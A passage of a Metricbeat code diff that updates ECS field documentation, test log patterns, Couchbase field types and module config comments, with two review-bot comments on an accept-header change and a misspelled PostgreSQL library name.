${PIP_INSTALL_PARAMS} -q --upgrade pip ; \ diff --git a/libbeat/tests/compose/compose.go b/libbeat/tests/compose/compose.go index d9ae77256fe..8588dcb19cd 100644 --- a/libbeat/tests/compose/compose.go +++ b/libbeat/tests/compose/compose.go 
@@ -112,7 +112,7 @@ func EnsureUp(t testing.TB, service string, options ...UpOption) HostInfo { // Get host information host, err := compose.HostInformation(service) if err != nil { - t.Fatalf("getting host for %s", service) + t.Fatalf("getting host for %s: %v", service, err) } return host diff --git a/libbeat/tests/system/test_ilm.py b/libbeat/tests/system/test_ilm.py index 2913893e11c..12c79fad61d 100644 --- a/libbeat/tests/system/test_ilm.py +++ b/libbeat/tests/system/test_ilm.py @@ -3,6 +3,7 @@ import logging import os import pytest +import re import shutil import unittest @@ -12,6 +13,9 @@ INTEGRATION_TESTS = os.environ.get('INTEGRATION_TESTS', False) +MSG_ILM_POLICY_LOADED = re.compile('ILM policy .* successfully created.') + + class TestRunILM(BaseTest): def setUp(self): @@ -46,7 +50,7 @@ def test_ilm_default(self): self.render_config() proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -84,7 +88,7 @@ def test_policy_name(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() 
@@ -103,7 +107,7 @@ def test_rollover_alias(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -123,7 +127,7 @@ def test_pattern(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -143,7 +147,7 @@ def test_pattern_date(self): proc = self.start_beat() self.wait_until(lambda: self.log_contains("mockbeat start running.")) - self.wait_until(lambda: self.log_contains("ILM policy successfully loaded")) + self.wait_until(lambda: self.log_contains(MSG_ILM_POLICY_LOADED)) self.wait_until(lambda: self.log_contains("PublishEvents: 1 events have been published")) proc.check_kill_and_wait() @@ -286,12 +290,12 @@ def setUp(self): self.cmd = "ilm-policy" def assert_log_contains_policy(self): - assert self.log_contains('ILM policy successfully loaded.') + assert self.log_contains(MSG_ILM_POLICY_LOADED) assert self.log_contains('"max_age": "30d"') assert self.log_contains('"max_size": "50gb"') def assert_log_contains_write_alias(self): - assert self.log_contains('Write alias successfully generated.') + assert self.log_contains(re.compile('Index Alias .* successfully created.')) def test_default(self): """ diff --git a/metricbeat/Dockerfile b/metricbeat/Dockerfile index 61805ca85c0..a0e3559f514 100644 --- a/metricbeat/Dockerfile +++ b/metricbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt update \ 
diff --git a/metricbeat/cmd/root.go b/metricbeat/cmd/root.go index 8da887270bb..e7211f223cd 100644 --- a/metricbeat/cmd/root.go +++ b/metricbeat/cmd/root.go @@ -43,7 +43,7 @@ const ( Name = "metricbeat" // ecsVersion specifies the version of ECS that this beat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // RootCmd to handle beats cli diff --git a/metricbeat/docs/fields.asciidoc b/metricbeat/docs/fields.asciidoc index 0281909a8b6..4f9932918f8 100644 --- a/metricbeat/docs/fields.asciidoc +++ b/metricbeat/docs/fields.asciidoc @@ -5740,6 +5740,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-beat]] == Beat fields @@ -8164,7 +8173,7 @@ type: long Number of get hits. -type: long +type: double -- @@ -8236,7 +8245,7 @@ type: long Number of operations performed on Couchbase. -type: long +type: double -- @@ -10167,6 +10176,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`client.geo.continent_name`*:: + -- @@ -10224,6 +10244,18 @@ example: boston-dc -- +*`client.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`client.geo.region_iso_code`*:: + -- @@ -10246,6 +10278,17 @@ example: Quebec -- +*`client.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`client.ip`*:: + -- 
@@ -10259,9 +10302,12 @@ type: ip + -- MAC address of the client. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`client.nat.ip`*:: @@ -10576,6 +10622,18 @@ example: us-east-1 -- +*`cloud.service.name`*:: ++ +-- +The cloud service name is intended to distinguish services running on different platforms within a provider, eg AWS EC2 vs Lambda, GCP GCE vs App Engine, Azure VM vs App Server. +Examples: app engine, app service, cloud run, fargate, lambda. + +type: keyword + +example: lambda + +-- + [float] === code_signature @@ -10593,6 +10651,18 @@ example: true -- +*`code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`code_signature.status`*:: + -- @@ -10616,6 +10686,18 @@ example: Microsoft Corporation -- +*`code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`code_signature.trusted`*:: + -- @@ -10782,6 +10864,17 @@ example: Montreal -- +*`destination.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`destination.geo.continent_name`*:: + -- @@ -10839,6 +10932,18 @@ example: boston-dc -- +*`destination.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`destination.geo.region_iso_code`*:: + -- 
@@ -10861,6 +10966,17 @@ example: Quebec -- +*`destination.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`destination.ip`*:: + -- @@ -10874,9 +10990,12 @@ type: ip + -- MAC address of the destination. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`destination.nat.ip`*:: @@ -11095,6 +11214,18 @@ example: true -- +*`dll.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`dll.code_signature.status`*:: + -- @@ -11118,6 +11249,18 @@ example: Microsoft Corporation -- +*`dll.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`dll.code_signature.trusted`*:: + -- @@ -11178,6 +11321,15 @@ type: keyword -- +*`dll.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`dll.name`*:: + -- @@ -11923,6 +12075,18 @@ example: true -- +*`file.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`file.code_signature.status`*:: + -- 
@@ -11946,6 +12110,18 @@ example: Microsoft Corporation -- +*`file.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`file.code_signature.trusted`*:: + -- @@ -12094,6 +12270,15 @@ type: keyword -- +*`file.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`file.inode`*:: + -- @@ -12584,6 +12769,17 @@ example: Montreal -- +*`geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`geo.continent_name`*:: + -- @@ -12641,6 +12837,18 @@ example: boston-dc -- +*`geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`geo.region_iso_code`*:: + -- @@ -12663,6 +12871,17 @@ example: Quebec -- +*`geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + [float] === group @@ -12700,8 +12919,9 @@ type: keyword [float] === hash -The hash fields represent different hash algorithms and their values. +The hash fields represent different bitwise hash algorithms and their values. Field names for common hashes (e.g. MD5, SHA1) are predefined. Add fields for other hashes by lowercasing the hash algorithm name and using underscore separators as appropriate (snake case, e.g. sha3_512). +Note that this fieldset is used for common hashes that may be computed over a range of generic bytes. Entity-specific hashes such as ja3 or imphash are placed in the fieldsets to which they relate (tls and pe, respectively). *`hash.md5`*:: @@ -12740,6 +12960,15 @@ type: keyword -- +*`hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + [float] === host 
@@ -12758,6 +12987,35 @@ example: x86_64 -- +*`host.cpu.usage`*:: ++ +-- +Percent CPU used which is normalized by the number of CPU cores and it ranges from 0 to 1. +Scaling factor: 1000. +For example: For a two core host, this value should be the average of the two cores, between 0 and 1. + +type: scaled_float + +-- + +*`host.disk.read.bytes`*:: ++ +-- +The total number of bytes (gauge) read successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + +*`host.disk.write.bytes`*:: ++ +-- +The total number of bytes (gauge) written successfully (aggregated from all disks) since the last metric collection. + +type: long + +-- + *`host.domain`*:: + -- @@ -12781,6 +13039,17 @@ example: Montreal -- +*`host.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`host.geo.continent_name`*:: + -- @@ -12838,6 +13107,18 @@ example: boston-dc -- +*`host.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`host.geo.region_iso_code`*:: + -- @@ -12860,6 +13141,17 @@ example: Quebec -- +*`host.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`host.hostname`*:: + -- @@ -12893,10 +13185,13 @@ type: ip *`host.mac`*:: + -- -Host mac addresses. +Host MAC addresses. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`host.name`*:: 
@@ -12909,6 +13204,42 @@ type: keyword -- +*`host.network.egress.bytes`*:: ++ +-- +The number of bytes (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.egress.packets`*:: ++ +-- +The number of packets (gauge) sent out on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.bytes`*:: ++ +-- +The number of bytes received (gauge) on all network interfaces by the host since the last metric collection. + +type: long + +-- + +*`host.network.ingress.packets`*:: ++ +-- +The number of packets (gauge) received on all network interfaces by the host since the last metric collection. + +type: long + +-- + *`host.os.family`*:: + -- @@ -13186,6 +13517,18 @@ format: bytes -- +*`http.request.id`*:: ++ +-- +A unique identifier for each HTTP request to correlate logs between clients and servers in transactions. +The id may be contained in a non-standard HTTP header, such as `X-Request-ID` or `X-Correlation-ID`. + +type: keyword + +example: 123e4567-e89b-12d3-a456-426614174000 + +-- + *`http.request.method`*:: + -- @@ -13719,7 +14062,7 @@ This could be a custom hardware appliance or a server that has been configured t *`observer.egress`*:: + -- -Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.egress holds information like interface number and name, vlan, and zone information to classify egress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -13783,7 +14126,7 @@ example: outside *`observer.egress.zone`*:: + -- -Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. +Network zone of outbound traffic as reported by the observer to categorize the destination area of egress traffic, e.g. Internal, External, DMZ, HR, Legal, etc. type: keyword @@ -13802,6 +14145,17 @@ example: Montreal -- +*`observer.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`observer.geo.continent_name`*:: + -- @@ -13859,6 +14213,18 @@ example: boston-dc -- +*`observer.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`observer.geo.region_iso_code`*:: + -- @@ -13881,6 +14247,17 @@ example: Quebec -- +*`observer.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`observer.hostname`*:: + -- @@ -13893,7 +14270,7 @@ type: keyword *`observer.ingress`*:: + -- -Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. +Observer.ingress holds information like interface number and name, vlan, and zone information to classify ingress traffic. Single armed monitoring such as a network sensor on a span port should only use observer.ingress to categorize traffic. type: object 
@@ -13957,7 +14334,7 @@ example: outside *`observer.ingress.zone`*:: + -- -Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. +Network zone of incoming traffic as reported by the observer to categorize the source area of ingress traffic. e.g. internal, External, DMZ, HR, Legal, etc. type: keyword @@ -13977,10 +14354,13 @@ type: ip *`observer.mac`*:: + -- -MAC addresses of the observer +MAC addresses of the observer. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: ["00-00-5E-00-53-23", "00-00-5E-00-53-24"] + -- *`observer.name`*:: @@ -14550,6 +14930,18 @@ example: true -- +*`process.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.code_signature.status`*:: + -- @@ -14573,6 +14965,18 @@ example: Microsoft Corporation -- +*`process.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.code_signature.trusted`*:: + -- @@ -14695,6 +15099,15 @@ type: keyword -- +*`process.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.name`*:: + -- 
@@ -14749,6 +15162,18 @@ example: true -- +*`process.parent.code_signature.signing_id`*:: ++ +-- +The identifier used to sign the process. +This is used to identify the application manufactured by a software vendor. The field is relevant to Apple *OS only. + +type: keyword + +example: com.apple.xpc.proxy + +-- + *`process.parent.code_signature.status`*:: + -- @@ -14772,6 +15197,18 @@ example: Microsoft Corporation -- +*`process.parent.code_signature.team_id`*:: ++ +-- +The team identifier used to sign the process. +This is used to identify the team or vendor of a software product. The field is relevant to Apple *OS only. + +type: keyword + +example: EQHXZ8M8AV + +-- + *`process.parent.code_signature.trusted`*:: + -- @@ -14894,6 +15331,15 @@ type: keyword -- +*`process.parent.hash.ssdeep`*:: ++ +-- +SSDEEP hash. + +type: keyword + +-- + *`process.parent.name`*:: + -- @@ -15632,6 +16078,17 @@ example: Montreal -- +*`server.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`server.geo.continent_name`*:: + -- @@ -15689,6 +16146,18 @@ example: boston-dc -- +*`server.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`server.geo.region_iso_code`*:: + -- @@ -15711,6 +16180,17 @@ example: Quebec -- +*`server.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`server.ip`*:: + -- 
@@ -15724,9 +16204,12 @@ type: ip + -- MAC address of the server. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`server.nat.ip`*:: @@ -16094,6 +16577,17 @@ example: Montreal -- +*`source.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- + *`source.geo.continent_name`*:: + -- @@ -16151,6 +16645,18 @@ example: boston-dc -- +*`source.geo.postal_code`*:: ++ +-- +Postal code associated with the location. +Values appropriate for this field may also be known as a postcode or ZIP code and will vary widely from country to country. + +type: keyword + +example: 94040 + +-- + *`source.geo.region_iso_code`*:: + -- @@ -16173,6 +16679,17 @@ example: Quebec -- +*`source.geo.timezone`*:: ++ +-- +The time zone of the location, such as IANA time zone name. + +type: keyword + +example: America/Argentina/Buenos_Aires + +-- + *`source.ip`*:: + -- @@ -16186,9 +16703,12 @@ type: ip + -- MAC address of the source. +The notation format from RFC 7042 is suggested: Each octet (that is, 8-bit byte) is represented by two [uppercase] hexadecimal digits giving the value of the octet as an unsigned integer. Successive octets are separated by a hyphen. type: keyword +example: 00-00-5E-00-53-23 + -- *`source.nat.ip`*:: diff --git a/metricbeat/docs/modules/kafka.asciidoc b/metricbeat/docs/modules/kafka.asciidoc index 44fb4b55313..17d7ee314d0 100644 --- a/metricbeat/docs/modules/kafka.asciidoc +++ b/metricbeat/docs/modules/kafka.asciidoc 
@@ -85,6 +85,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: diff --git a/metricbeat/docs/modules/postgresql.asciidoc b/metricbeat/docs/modules/postgresql.asciidoc index ef475199d6a..995e6854f68 100644 --- a/metricbeat/docs/modules/postgresql.asciidoc +++ b/metricbeat/docs/modules/postgresql.asciidoc @@ -86,6 +86,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/helper/prometheus/prometheus.go b/metricbeat/helper/prometheus/prometheus.go index 0add9edd9bb..3568310466e 100644 --- a/metricbeat/helper/prometheus/prometheus.go +++ b/metricbeat/helper/prometheus/prometheus.go @@ -35,7 +35,7 @@ import ( "github.com/elastic/beats/v7/metricbeat/mb" ) -const acceptHeader = `application/openmetrics-text; version=0.0.1,text/plain;version=0.0.4;q=0.5,*/*;q=0.1` +const acceptHeader = `text/plain;version=0.0.4;q=0.5,*/*;q=0.1` // Prometheus helper retrieves prometheus formatted metrics type Prometheus interface { diff --git a/metricbeat/metricbeat.reference.yml b/metricbeat/metricbeat.reference.yml index 685dac86452..93d75700a69 100644 --- a/metricbeat/metricbeat.reference.yml +++ b/metricbeat/metricbeat.reference.yml 
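Review bot: `acceptHeader` drops `application/openmetrics-text` without a comment. That leaves `text/plain;version=0.0.4;q=0.5` as the most preferred type, with nothing to tell the next reader that this is deliberate. Presumably the decoder behind this helper does not handle the OpenMetrics body correctly, but that is not visible in the hunk. A line such as `// acceptHeader omits application/openmetrics-text on purpose; see <issue reference>.` above the constant would keep the type from being added back by someone who only sees that scrape targets offer it.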
@@ -436,6 +436,10 @@ metricbeat.modules: #username: "" #password: "" + # SASL authentication mechanism used. Can be one of PLAIN, SCRAM-SHA-256 or SCRAM-SHA-512. + # Defaults to PLAIN when `username` and `password` are configured. + #sasl.mechanism: '' + # Metrics collected from a Kafka broker using Jolokia #- module: kafka # metricsets: @@ -734,6 +738,10 @@ metricbeat.modules: # Stats about every PostgreSQL process - activity + # Stats about every statement executed in the server. It requires the + # `pg_stats_statement` library to be configured in the server. + #- statement + period: 10s # The host must be passed as PostgreSQL URL. Example: diff --git a/metricbeat/module/consul/_meta/Dockerfile b/metricbeat/module/consul/_meta/Dockerfile index 640e783c9a6..2846d457c3a 100644 --- a/metricbeat/module/consul/_meta/Dockerfile +++ b/metricbeat/module/consul/_meta/Dockerfile @@ -5,6 +5,5 @@ ENV CONSUL_BIND_INTERFACE='eth0' EXPOSE 8500 -# Use the same healthcheck as the Windows version of the image. -# https://github.com/Microsoft/mssql-docker/blob/a3020afeec9be1eb2d67645ac739438eb8f2c545/windows/mssql-server-windows/dockerfile#L31 -HEALTHCHECK --interval=1s --retries=90 CMD curl http://0.0.0.0:8500/v1/agent/metrics +# Wait till the service reports runtime metrics +HEALTHCHECK --interval=1s --retries=90 CMD curl -s http://0.0.0.0:8500/v1/agent/metrics | grep -q consul.runtime diff --git a/metricbeat/module/consul/docker-compose.yml b/metricbeat/module/consul/docker-compose.yml index 5131b14aa32..998c089b2b7 100644 --- a/metricbeat/module/consul/docker-compose.yml +++ b/metricbeat/module/consul/docker-compose.yml @@ -2,7 +2,7 @@ version: '2.3' services: consul: - image: docker.elastic.co/integrations-ci/beats-consul:${CONSUL_VERSION:-1.9.3}-1 + image: docker.elastic.co/integrations-ci/beats-consul:${CONSUL_VERSION:-1.9.3}-2 build: context: ./_meta args: 
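Review bot: The comment added in the `@@ -734,6 +738,10 @@` hunk names the library `pg_stats_statement`, but the statement metricset documentation added in this same commit uses `pg_stat_statements` in its `shared_preload_libraries` example. Anyone copying the name from this comment into the server configuration gets a library that cannot be loaded. The second comment line should read `# \`pg_stat_statements\` library to be configured in the server.`. The same wording appears in the `metricbeat/docs/modules/postgresql.asciidoc` hunk and in `metricbeat/module/postgresql/_meta/config.reference.yml`, so all three need the fix.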
diff --git a/metricbeat/module/couchbase/fields.go b/metricbeat/module/couchbase/fields.go
index e283a53e038..85d8cb7ae02 100644
--- a/metricbeat/module/couchbase/fields.go
+++ b/metricbeat/module/couchbase/fields.go
@@ -32,5 +32,5 @@ func init() { // AssetCouchbase returns asset data. // This is the base64 encoded gzipped contents of module/couchbase. func AssetCouchbase() string { - return "eJzMmVFv4zYMgN/zK4gAA3rAznvPw4DihuH2kOFw656GwUdLTKzVtjxJTpr79QMlO3FcO3FSN5kf+hC75EeRIinqIzzTbgFCVyJN0NIMwCmX0QLmn5rf5jMASVYYVTqliwX8PAMAWJIzSlgQOstIOJKwMjqH/b+BJbMhY6MZgE21cbHQxUqtF7DCzGsylBFaWsAa+RtyThVru4C/5tZm8x9hnjpXzv+eAawUZdIuvN6PUGBOx8z8uF3JooyuyvqXHmh+vu3/8xsIXThUhQWXEuS1RS5FB1syBFYYLF9ZFtWi2lRtsqQSz+T2P/ehncDj57CIQVaDFrW+Ol695ukytbn479GLhuyZdlttZOfdCT5+fsecQK/8ygXKqFcrq5hO69OuHKVVosOosiSjZOfIduSstMnRLaDvXYDLdLG+jOwP9d2TVZaMVw9b5VJV1Ji2obYlCbVSJME6dBSiDQ2BIaskFQ5UAV8flwN2KfscrciJdABc6irJugt+zpVVnpBhQBYPtfgTADdd2MdcV4Xb07FuePAKPvQj5pRrs7sXZNAeMJNdK1BPQ/9baYeRwfwOyF8fl1fyVpaiUrgB2pKMoKL7NvBagRnJeJVp7H5whvtLkIprOmJ/WGkDKJzaEOjkHxLOfgBcc3Z33qpQfirDdgYDLW/Zhx8GLNSljUsysSXxDjtNl2SQP7O8TGBJ6EL2gyhHeSzYWRN5/kDBoi2gtVoo5BrOOas3ue7LblZZR2aa6lYLm6a8pVJGK0N0sw30qyGCFI0EaTjqbImCOHv7aKtNO7mJGDlsJKcdZjcj/3yA9urBq2dVl7HflvrJQ75acNygyjDJCJy+DN9XiA1m1e1i5nOXvp13LwNPdrHvcv4X6L7huST0c3yJQ46ZNLUt8aXJ7l5sc6w4VcRUIeklrruGPJks2S9DJxB2WM2x32O/sVJ/RlKC4GHJa3Wy1N6Yb+/EU2TcrrTz1233Epf+q9NXF50rfaHlPeiPUkBlDJ8BGOWi/XSw5w5ZbcCWK7hv7wbMr3PDoDX3KIrsgKM6OHrt7xQtV8XJXcpel3ZUpduPXLSkaVplH4mT9Mkil/Ga+gvu2840a1918xwLaftVszmR1MJGfJaP+QB2rznCcQ/jFxqY7HQYti1Ah7e14BcOPVvPmVrE3fMbhmgZYYgt0SnMztjy1pFYOI6HncNFutYKG0XbUeu9xzwZNO8SGBez+g/vQRoC4lLOmzp+PGJZxZVTmfruZySxQdc3aHrrKOkpJfj05U9oqQJWNTwUqhuD2A9OQt2cfCjTNB9BxwgM33FM2k8UIyZEvk3rpaMyTtZxGCN35/tvX572jBpKMpxpSYJVhaAwYfcXT7BFC9ahcTQwV1uTi1Plpgr64zrIggcO8Nq6aa9iOIwbqc01w7B3ciGbwy5mmRbs1fvMyQVygDQT8z3MmcHBAd+Qd3U//TsQNvpGXT8MjiInu2JgDftD7/mKX3MNH0/eljIaL3ancaPBBu9rrp4Fvb6JOQ+jy+nzwfGsv85Xunh9o3yMYrdYvpu7WHjoJUfuO08zuY8OQR2ADh3NSZiqdCqnaOhq5opFUTmBrIwq1rBNlTiUOF9HVHFwIjxYEgNcmyQ2VGZKYMwlOtTnyePJS/1JalHlVDjbvkL2um00+y8AAP//ab0SFw==" + return "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" } 
diff --git a/metricbeat/module/couchbase/node/_meta/data.json b/metricbeat/module/couchbase/node/_meta/data.json index 7b3c48537a4..bd533a03867 100644 --- a/metricbeat/module/couchbase/node/_meta/data.json +++ b/metricbeat/module/couchbase/node/_meta/data.json @@ -37,7 +37,7 @@ "value": 7303 }, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "hostname": "172.17.0.2:8091", "mcd_memory": { "allocated": { @@ -58,7 +58,7 @@ "bytes": 53962016 } }, - "ops": 0, + "ops": 1.1, "swap": { "total": { "bytes": 4189057024 diff --git a/metricbeat/module/couchbase/node/_meta/fields.yml b/metricbeat/module/couchbase/node/_meta/fields.yml index 95f6613e4cc..bb36fc9c68f 100644 --- a/metricbeat/module/couchbase/node/_meta/fields.yml +++ b/metricbeat/module/couchbase/node/_meta/fields.yml @@ -51,7 +51,7 @@ description: > Number of disk fetches performed since the server was started. - name: get_hits - type: long + type: double description: > Number of get hits. - name: hostname @@ -80,7 +80,7 @@ description: > Memory used by the node (bytes). - name: ops - type: long + type: double description: > Number of operations performed on Couchbase. - name: swap.total.bytes diff --git a/metricbeat/module/couchbase/node/_meta/testdata/docs.json b/metricbeat/module/couchbase/node/_meta/testdata/docs.json index 73519a9b201..4ba618e5545 100644 --- a/metricbeat/module/couchbase/node/_meta/testdata/docs.json +++ b/metricbeat/module/couchbase/node/_meta/testdata/docs.json @@ -43,9 +43,9 @@ "curr_items": 7303, "curr_items_tot": 7303, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "mem_used": 53962016, - "ops": 0, + "ops": 1.1, "vb_replica_curr_items": 0 }, "uptime": "7260", diff --git a/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json b/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json index de61c765031..16f5024c0a4 100644 --- a/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json 
+++ b/metricbeat/module/couchbase/node/_meta/testdata/docs.json-expected.json @@ -37,7 +37,7 @@ "value": 7303 }, "ep_bg_fetched": 0, - "get_hits": 0, + "get_hits": 1.1, "hostname": "172.17.0.2:8091", "mcd_memory": { "allocated": { @@ -58,7 +58,7 @@ "bytes": 53962016 } }, - "ops": 0, + "ops": 1.1, "swap": { "total": { "bytes": 4189057024 diff --git a/metricbeat/module/couchbase/node/data.go b/metricbeat/module/couchbase/node/data.go index e1f797ed1bb..901729737f9 100644 --- a/metricbeat/module/couchbase/node/data.go +++ b/metricbeat/module/couchbase/node/data.go @@ -45,9 +45,9 @@ type NodeInterestingStats struct { CurrItems int64 `json:"curr_items"` CurrItemsTot int64 `json:"curr_items_tot"` EpBgFetched int64 `json:"ep_bg_fetched"` - GetHits int64 `json:"get_hits"` + GetHits float64 `json:"get_hits"` MemUsed int64 `json:"mem_used"` - Ops int64 `json:"ops"` + Ops float64 `json:"ops"` VbReplicaCurrItems int64 `json:"vb_replica_curr_items"` } diff --git a/metricbeat/module/http/_meta/Dockerfile b/metricbeat/module/http/_meta/Dockerfile index 07d81b3c5b9..fdda93f7765 100644 --- a/metricbeat/module/http/_meta/Dockerfile +++ b/metricbeat/module/http/_meta/Dockerfile @@ 